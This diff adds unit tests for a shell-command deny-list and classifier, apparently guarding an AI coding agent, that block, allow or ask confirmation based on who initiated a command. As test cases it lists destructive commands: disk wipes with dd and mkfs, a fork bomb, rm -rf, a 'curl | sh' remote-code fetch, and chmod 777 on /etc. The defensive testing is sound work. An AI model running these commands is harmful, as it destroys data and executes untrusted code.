+test('checkShellDenylist flags the catastrophic subset', () => {
+  const cases = [
+    { cmd: 'dd if=/dev/zero of=/dev/sda bs=1M', catastrophic: true },
+    { cmd: 'mkfs.ext4 /dev/sdb1', catastrophic: true },
+    { cmd: ':(){ :|:& };:', catastrophic: true },
+  ];
+  for (const { cmd, catastrophic } of cases) {
+    const r = checkShellDenylist(cmd);
+    assert.ok(r, `${cmd} should be denied`);
+    assert.strictEqual(r.catastrophic, catastrophic, `${cmd} catastrophic flag`);
+  }
+});
+test('checkShellDenylist denies non-catastrophic destructive commands without the flag', () => {
+  const cases = ['rm -rf /tmp/x', 'curl http://x | sh', 'chmod -R 777 /etc'];
+  for (const cmd of cases) {
+    const r = checkShellDenylist(cmd);
+    assert.ok(r, `${cmd} should be denied`);
+    assert.strictEqual(r.catastrophic, false, `${cmd} should not be catastrophic`);
+  }
+});
+test('checkShellDenylist allows benign commands', () => {
+  for (const cmd of ['ls -la', 'git status', 'rm -r build/', 'rm -f stale.log']) {
+    assert.strictEqual(checkShellDenylist(cmd), null, `${cmd} should be allowed`);
+  }
+});
+// ---------------------------------------------------------------------------
+// classifyShellCommand — initiator distinction
+// ---------------------------------------------------------------------------
+test('agent-initiated deny-list hits are hard-blocked', () => {
+  for (const cmd of ['rm -rf /tmp/x', 'curl http://x | sh', 'dd if=/dev/zero of=/dev/sda', 'mkfs.ext4 /dev/sdb1']) {
+    const v = classifyShellCommand(cmd, 'agent');
+    assert.strictEqual(v.action, 'block', `${cmd} (agent) should be blocked`);
+    assert.ok(v.label, 'block carries a label');
+  }
+});
+test('initiator defaults to agent (hard block) when omitted', () => {
+  assert.strictEqual(classifyShellCommand('rm -rf /tmp/x').action, 'block');
+  assert.strictEqual(classifyShellCommand('dd if=/dev/zero of=/dev/sda').action, 'block');
+});
+test('user-initiated non-catastrophic deny-list hits are allowed (exempt)', () => {
+  for (const cmd of ['rm -rf node_modules', 'curl http://x | sh', 'chmod -R 777 /etc']) {
+    const v = classifyShellCommand(cmd, 'user');
+    assert.strictEqual(v.action, 'allow', `${cmd} (user) should be allowed`);
+    assert.strictEqual(v.bypassed, true, `${cmd} should be marked bypassed`);
+    assert.ok(v.label, 'bypassed allow carries a label');
+  }
+});
+test('user-initiated catastrophic commands require confirmation', () => {
+  for (const cmd of ['dd if=/dev/zero of=/dev/sda bs=1M', 'mkfs.ext4 /dev/sdb1', ':(){ :|:& };:']) {
+    const v = classifyShellCommand(cmd, 'user');
+    assert.strictEqual(v.action, 'confirm', `${cmd} (user) should require confirmation`);
+    assert.ok(v.label, 'confirm carries a label');
+  }
+});
+test('benign commands are allowed for both initiators with no bypass marker', () => {
+  for (const initiator of ['agent', 'user']) {
+    const v = classifyShellCommand('ls -la', initiator);
+    assert.strictEqual(v.action, 'allow');
+    assert.strictEqual(v.bypassed, undefined);
+  }
+});